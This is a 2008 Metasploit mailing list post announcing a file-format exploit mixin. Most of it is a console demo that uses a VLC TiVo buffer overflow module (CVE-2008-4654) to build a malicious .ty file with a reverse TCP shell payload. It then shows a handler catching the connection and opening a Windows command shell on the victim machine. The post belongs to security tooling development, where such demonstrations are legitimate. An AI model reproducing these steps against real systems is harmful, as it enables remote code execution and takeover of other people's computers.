Metasploit mailing list archives
fileformat exploits.
From: mc at metasploit.com (MC)
Date: Tue, 2 Dec 2008 20:33:56 -0500 (EST)
Just added a small mixin and example exploit that may assist for file format based bugs. quick demo: msf > resource /tmp/fileformat_test resource> use exploit/windows/fileformat/videolan_tivo resource> info Name: VideoLAN VLC TiVo Buffer Overflow Version: $Revision:$ Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Provided by: MC <y0 at w00t-shell.net> Available targets: Id Name -- ---- 0 VideoLAN VLC 0.9.4 (XP SP3 English) 1 VideoLAN VLC 0.9.2 (XP SP3 English) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.ty no The file name. OUTPUTPATH ./data/exploits/ no The location of the file. Payload information: Space: 550 Avoid: 1 characters Description: This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4654 http://www.securityfocus.com/bid/31813 resource> set TARGET 1 TARGET => 1 resource> set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp resource> set LHOST 172.10.1.100 LHOST => 172.10.1.100 resource> set LPORT 1975 LPORT => 1975 resource> exploit [*] Handler binding to LHOST 172.10.1.100 [*] Started reverse handler [*] Creating 'msf.ty' file ... [*] File 'msf.ty' is located in './data/exploits/' ... [*] Exploit completed, but no session was created. msf exploit(videolan_tivo) > resource /tmp/recieve resource> use exploit/multi/handler resource> set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp resource> set LHOST 172.10.1.100 LHOST => 172.10.1.100 resource> set LPORT 1975 LPORT => 1975 resource> exploit [*] Handler binding to LHOST 172.10.1.100 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (172.10.1.100:1975 -> 172.10.1.104:1055) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\VideoLAN\VLC> ...the same module exist in modules/exploits/windows/misc/ that can be used via network based attacks. -- ~ mc
Current thread:
- fileformat exploits. MC (Dec 02)